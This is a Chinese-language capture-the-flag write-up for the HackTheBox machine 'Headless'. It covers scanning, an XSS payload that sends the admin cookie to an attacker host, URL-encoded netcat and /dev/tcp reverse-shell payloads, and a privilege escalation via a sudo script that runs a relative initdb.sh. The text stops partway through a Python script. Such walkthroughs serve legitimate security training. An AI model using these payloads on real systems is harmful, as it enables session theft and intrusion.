HackThebox Headless

信息
IP	10.10.11.8
难度	EASY
状态	赛季四
地址	https://app.hackthebox.com/competitive/4/overview

XSS,命令注入

端口扫描

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|<SNIP>
|_    </html>

目录扫描

+ http://10.10.11.8:5000/dashboard (CODE:500|SIZE:265)  
+ http://10.10.11.8:5000/support (CODE:200|SIZE:265)  

support可以发送邮件(存在waf,有过滤),dashboard需要认证

漏洞利用

XSS获取admin cookie
请求头xss注入
(需要被过滤,才会将恶意信息发送给管理员)

<img src=x οnerrοr=fetch('http://Your_IP/'+document.cookie);/>
# 攻击机上需要开启web服务
sudo php -S 0.0.0.0:80   # 使用python也可

管理员Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
访问dashboard,将Cookie的值修改为ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
存在命令注入漏洞

反弹shell,payload(已进行url编码如下

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+Your_IP+4444+>/tmp/f

提权

sudo -l

dvir@headless:~$ sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

/usr/bin/syscheck是一个shell脚本

#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last\_modified\_time=$(/usr/bin/find /boot -name 'vmlinuz\*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted\_time=$(/usr/bin/date -d "@$last\_modified\_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted\_time"

disk\_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk\_space"

load\_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load\_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

./initdb.sh 2>/dev/null执行当前目录下的initdb.sh文件
创建文件initdb.sh,可以进行反弹shell

#!/bin/bash
/bin/bash -i >& /dev/tcp/YOUR_IP/4445 0>&1
# 攻击机监听
nc -lvnp 4445

或者给bash赋予suid权限,然后运行/bin/bash -p

提权后

系统定时运行下述的python代码

#!/usr/bin/python3

import os
# import requests
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.service import Service

def extract_number(filename):
    return os.path.splitext(filename)[0]

options = webdriver.FirefoxOptions()